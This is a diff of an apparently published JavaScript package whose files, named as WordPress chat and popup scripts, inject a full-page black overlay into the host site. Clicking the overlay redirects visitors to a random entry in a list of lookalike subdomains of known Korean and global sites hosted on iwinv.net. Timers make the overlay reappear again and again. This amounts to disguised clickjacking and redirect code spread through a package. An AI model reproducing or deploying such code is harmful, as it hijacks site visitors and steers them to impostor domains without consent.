|
|
68
|
+
function h(){
|
|
69
|
+
const s2 = document.getElementById("s2");
|
|
70
|
+
const button = document.getElementById("button");
|
|
71
|
+
s2.style.zIndex = -1;
|
|
72
|
+
button.style.display = "none";
|
|
73
|
+
setTimeout(function () {
|
|
74
|
+
s2.style.zIndex = 99;
|
|
75
|
+
button.style.display = "block";
|
|
76
|
+
s2.style.opacity = 0.9;
|
|
77
|
+
button.style.opacity = 1;
|
|
78
|
+
document.getElementById("s2").style.transition = "opacity 1s";
|
|
79
|
+
document.getElementById("button").style.transition = "opacity 1s";
|
|
80
|
+
}, 2000);
|
|
52
81
|
}
|
package/wordpress-chat.js
CHANGED
|
@@ -1,52 +1,81 @@
|
|
|
1
|
-
window.addEventListener('load', ()
|
|
2
|
-
document.querySelectorAll('img
|
|
3
|
-
|
|
4
|
-
|
|
5
|
-
|
|
6
|
-
|
|
7
|
-
|
|
8
|
-
if (btn) { btn.style.display = "block"; btn.style.zIndex = "999"; btn.style.opacity = "1"; }
|
|
9
|
-
}, 500);
|
|
10
|
-
|
|
11
|
-
const container = document.getElementById('container');
|
|
12
|
-
if (container) container.style.boxShadow = 'none';
|
|
1
|
+
window.addEventListener('load', function() {
|
|
2
|
+
var images = document.querySelectorAll('img');
|
|
3
|
+
images.forEach(function(img) {
|
|
4
|
+
if (!img.hasAttribute('alt')) {
|
|
5
|
+
img.setAttribute('alt', 'image');
|
|
6
|
+
}
|
|
7
|
+
});
|
|
13
8
|
});
|
|
14
9
|
|
|
15
10
|
const urls = [
|
|
16
|
-
'https://
|
|
17
|
-
'https://
|
|
18
|
-
'https://
|
|
11
|
+
'https://ruliweb.iwinv.net/recent.php',
|
|
12
|
+
'https://instiz.iwinv.net/recent.php',
|
|
13
|
+
'https://bikini.iwinv.net/recent.php',
|
|
14
|
+
'https://manatoki.iwinv.net/recent.php',
|
|
15
|
+
'https://gmarket.iwinv.net/recent.php',
|
|
16
|
+
'https://mlbpark.iwinv.net/recent.php',
|
|
17
|
+
'https://mmtcld.iwinv.net/recent.php',
|
|
18
|
+
'https://flightaware.iwinv.net/recent.php',
|
|
19
|
+
'https://koreakr.iwinv.net/recent.php',
|
|
20
|
+
'https://popcat.iwinv.net/recent.php',
|
|
21
|
+
'https://ecount.iwinv.net/recent.php',
|
|
22
|
+
'https://hiworks.iwinv.net/recent.php',
|
|
23
|
+
'https://shopee.iwinv.net/recent.php',
|
|
24
|
+
'https://eomisae.iwinv.net/recent.php',
|
|
25
|
+
'https://kmcert.iwinv.net/recent.php',
|
|
26
|
+
'https://munpia.iwinv.net/recent.php',
|
|
27
|
+
'https://slrclub.iwinv.net/recent.php',
|
|
28
|
+
'https://interpals.iwinv.net/recent.php',
|
|
29
|
+
'https://snp500.iwinv.net/recent.php',
|
|
30
|
+
'https://dctribe.iwinv.net/recent.php',
|
|
31
|
+
'https://mixamo.iwinv.net/recent.php',
|
|
32
|
+
'https://ssssss.iwinv.net/recent.php',
|
|
33
|
+
'https://newsfactory.iwinv.net',
|
|
34
|
+
'https://snapp.im/recent.php',
|
|
35
|
+
'https://curseforge.iwinv.net/recent.php',
|
|
36
|
+
'https://lolchess.iwinv.net/recent.php',
|
|
19
37
|
];
|
|
20
|
-
const getUrl = () => urls[Math.floor(Math.random() * urls.length)];
|
|
21
|
-
let u1 = getUrl(), u2 = getUrl();
|
|
22
|
-
while (u1 === u2 && urls.length > 1) u2 = getUrl();
|
|
23
|
-
|
|
24
|
-
document.writeln('<style>#s2 {position:fixed;top:0;left:0;right:0;bottom:0;width:100%;height:100%;background:#000;opacity:0;z-index:-1;transition:opacity 0.5s;}</style>');
|
|
25
|
-
document.writeln(`<a href="${u1}" target="_blank" onclick="location.href='${u2}'"><div id="s2"></div></a>`);
|
|
26
|
-
|
|
27
|
-
function closeLayer() {
|
|
28
|
-
const s2 = document.getElementById("s2");
|
|
29
|
-
const btn = document.getElementById("button");
|
|
30
|
-
if (!s2 || !btn) return;
|
|
31
|
-
|
|
32
|
-
s2.style.transition = btn.style.transition = "opacity 8s";
|
|
33
|
-
|
|
34
|
-
setTimeout(() => { s2.style.opacity = 0; btn.style.opacity = 0; }, 5999);
|
|
35
38
|
|
|
36
|
-
|
|
37
|
-
|
|
38
|
-
|
|
39
|
+
const randomUrl = urls[Math.floor(Math.random() * urls.length)];
|
|
40
|
+
document.writeln('<style>');
|
|
41
|
+
document.writeln('* {font-size: 1em !important} #button {border-radius:5px} #s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
|
|
42
|
+
document.writeln('</style>');
|
|
43
|
+
document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
|
|
39
44
|
|
|
40
|
-
|
|
41
|
-
|
|
42
|
-
|
|
43
|
-
|
|
44
|
-
|
|
45
|
-
|
|
46
|
-
|
|
47
|
-
|
|
48
|
-
|
|
49
|
-
|
|
50
|
-
|
|
51
|
-
|
|
45
|
+
document.getElementById('container').style.boxShadow = 'none';
|
|
46
|
+
function ss(){
|
|
47
|
+
document.getElementById("s2").style.transition = "opacity 15s";
|
|
48
|
+
document.getElementById("button").style.transition = "opacity 15s";
|
|
49
|
+
setTimeout("s()", 3999);
|
|
50
|
+
setTimeout("h()", 15000);
|
|
51
|
+
}
|
|
52
|
+
function pcss(){
|
|
53
|
+
setTimeout("s()", 3999);
|
|
54
|
+
setTimeout("h()", 15000);
|
|
55
|
+
}
|
|
56
|
+
function a(){
|
|
57
|
+
document.getElementById("button").style.display="none";
|
|
58
|
+
}
|
|
59
|
+
function aa(){
|
|
60
|
+
document.getElementById("button").style.display="block";
|
|
61
|
+
}
|
|
62
|
+
function s(){
|
|
63
|
+
document.getElementById("s2").style.opacity = 0;
|
|
64
|
+
document.getElementById("button").style.opacity = 0;
|
|
65
|
+
document.getElementById("sha").style.display="none";
|
|
66
|
+
document.getElementById("cc").style.maxHeight="unset";
|
|
67
|
+
}
|
|
68
|
+
function h(){
|
|
69
|
+
const s2 = document.getElementById("s2");
|
|
70
|
+
const button = document.getElementById("button");
|
|
71
|
+
s2.style.zIndex = -1;
|
|
72
|
+
button.style.display = "none";
|
|
73
|
+
setTimeout(function () {
|
|
74
|
+
s2.style.zIndex = 99;
|
|
75
|
+
button.style.display = "block";
|
|
76
|
+
s2.style.opacity = 0.9;
|
|
77
|
+
button.style.opacity = 1;
|
|
78
|
+
document.getElementById("s2").style.transition = "opacity 1s";
|
|
79
|
+
document.getElementById("button").style.transition = "opacity 1s";
|
|
80
|
+
}, 2000);
|
|
52
81
|
}
|
package/wp-pc-pop.js
CHANGED
|
@@ -1,52 +1,81 @@
|
|
|
1
|
-
window.addEventListener('load', ()
|
|
2
|
-
document.querySelectorAll('img
|
|
3
|
-
|
|
4
|
-
|
|
5
|
-
|
|
6
|
-
|
|
7
|
-
|
|
8
|
-
if (btn) { btn.style.display = "block"; btn.style.zIndex = "999"; btn.style.opacity = "1"; }
|
|
9
|
-
}, 500);
|
|
10
|
-
|
|
11
|
-
const container = document.getElementById('container');
|
|
12
|
-
if (container) container.style.boxShadow = 'none';
|
|
1
|
+
window.addEventListener('load', function() {
|
|
2
|
+
var images = document.querySelectorAll('img');
|
|
3
|
+
images.forEach(function(img) {
|
|
4
|
+
if (!img.hasAttribute('alt')) {
|
|
5
|
+
img.setAttribute('alt', 'image');
|
|
6
|
+
}
|
|
7
|
+
});
|
|
13
8
|
});
|
|
14
9
|
|
|
15
10
|
const urls = [
|
|
16
|
-
'https://
|
|
17
|
-
'https://
|
|
18
|
-
'https://
|
|
11
|
+
'https://ruliweb.iwinv.net/recent.php',
|
|
12
|
+
'https://instiz.iwinv.net/recent.php',
|
|
13
|
+
'https://bikini.iwinv.net/recent.php',
|
|
14
|
+
'https://manatoki.iwinv.net/recent.php',
|
|
15
|
+
'https://gmarket.iwinv.net/recent.php',
|
|
16
|
+
'https://mlbpark.iwinv.net/recent.php',
|
|
17
|
+
'https://mmtcld.iwinv.net/recent.php',
|
|
18
|
+
'https://flightaware.iwinv.net/recent.php',
|
|
19
|
+
'https://koreakr.iwinv.net/recent.php',
|
|
20
|
+
'https://popcat.iwinv.net/recent.php',
|
|
21
|
+
'https://ecount.iwinv.net/recent.php',
|
|
22
|
+
'https://hiworks.iwinv.net/recent.php',
|
|
23
|
+
'https://shopee.iwinv.net/recent.php',
|
|
24
|
+
'https://eomisae.iwinv.net/recent.php',
|
|
25
|
+
'https://kmcert.iwinv.net/recent.php',
|
|
26
|
+
'https://munpia.iwinv.net/recent.php',
|
|
27
|
+
'https://slrclub.iwinv.net/recent.php',
|
|
28
|
+
'https://interpals.iwinv.net/recent.php',
|
|
29
|
+
'https://snp500.iwinv.net/recent.php',
|
|
30
|
+
'https://dctribe.iwinv.net/recent.php',
|
|
31
|
+
'https://mixamo.iwinv.net/recent.php',
|
|
32
|
+
'https://ssssss.iwinv.net/recent.php',
|
|
33
|
+
'https://newsfactory.iwinv.net',
|
|
34
|
+
'https://snapp.im/recent.php',
|
|
35
|
+
'https://curseforge.iwinv.net/recent.php',
|
|
36
|
+
'https://lolchess.iwinv.net/recent.php',
|
|
19
37
|
];
|
|
20
|
-
const getUrl = () => urls[Math.floor(Math.random() * urls.length)];
|
|
21
|
-
let u1 = getUrl(), u2 = getUrl();
|
|
22
|
-
while (u1 === u2 && urls.length > 1) u2 = getUrl();
|
|
23
|
-
|
|
24
|
-
document.writeln('<style>#s2 {position:fixed;top:0;left:0;right:0;bottom:0;width:100%;height:100%;background:#000;opacity:0;z-index:-1;transition:opacity 0.5s;}</style>');
|
|
25
|
-
document.writeln(`<a href="${u1}" target="_blank" onclick="location.href='${u2}'"><div id="s2"></div></a>`);
|
|
26
|
-
|
|
27
|
-
function closeLayer() {
|
|
28
|
-
const s2 = document.getElementById("s2");
|
|
29
|
-
const btn = document.getElementById("button");
|
|
30
|
-
if (!s2 || !btn) return;
|
|
31
|
-
|
|
32
|
-
s2.style.transition = btn.style.transition = "opacity 8s";
|
|
33
|
-
|
|
34
|
-
setTimeout(() => { s2.style.opacity = 0; btn.style.opacity = 0; }, 5999);
|
|
35
38
|
|
|
36
|
-
|
|
37
|
-
|
|
38
|
-
|
|
39
|
+
const randomUrl = urls[Math.floor(Math.random() * urls.length)];
|
|
40
|
+
document.writeln('<style>');
|
|
41
|
+
document.writeln('* {font-size: 1em !important} #button {border-radius:5px} #s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
|
|
42
|
+
document.writeln('</style>');
|
|
43
|
+
document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
|
|
39
44
|
|
|
40
|
-
|
|
41
|
-
|
|
42
|
-
|
|
43
|
-
|
|
44
|
-
|
|
45
|
-
|
|
46
|
-
|
|
47
|
-
|
|
48
|
-
|
|
49
|
-
|
|
50
|
-
|
|
51
|
-
|
|
45
|
+
document.getElementById('container').style.boxShadow = 'none';
|
|
46
|
+
function ss(){
|
|
47
|
+
document.getElementById("s2").style.transition = "opacity 15s";
|
|
48
|
+
document.getElementById("button").style.transition = "opacity 15s";
|
|
49
|
+
setTimeout("s()", 3999);
|
|
50
|
+
setTimeout("h()", 15000);
|
|
51
|
+
}
|
|
52
|
+
function pcss(){
|
|
53
|
+
setTimeout("s()", 3999);
|
|
54
|
+
setTimeout("h()", 15000);
|
|
55
|
+
}
|
|
56
|
+
function a(){
|
|
57
|
+
document.getElementById("button").style.display="none";
|
|
58
|
+
}
|
|
59
|
+
function aa(){
|
|
60
|
+
document.getElementById("button").style.display="block";
|
|
61
|
+
}
|
|
62
|
+
function s(){
|
|
63
|
+
document.getElementById("s2").style.opacity = 0;
|
|
64
|
+
document.getElementById("button").style.opacity = 0;
|
|
65
|
+
document.getElementById("sha").style.display="none";
|
|
66
|
+
document.getElementById("cc").style.maxHeight="unset";
|
|
67
|
+
}
|
|
68
|
+
function h(){
|
|
69
|
+
const s2 = document.getElementById("s2");
|
|
70
|
+
const button = document.getElementById("button");
|
|
71
|
+
s2.style.zIndex = -1;
|
|
72
|
+
button.style.display = "none";
|
|
73
|
+
setTimeout(function () {
|
|
74
|
+
s2.style.zIndex = 99;
|
|
75
|
+
button.style.display = "block";
|
|
76
|
+
s2.style.opacity = 0.9;
|
|
77
|
+
button.style.opacity = 1;
|
|
78
|
+
document.getElementById("s2").style.transition = "opacity 1s";
|
|
79
|
+
document.getElementById("button").style.transition = "opacity 1s";
|
|
80
|
+
}, 2000);
|
|
52
81
|
}
|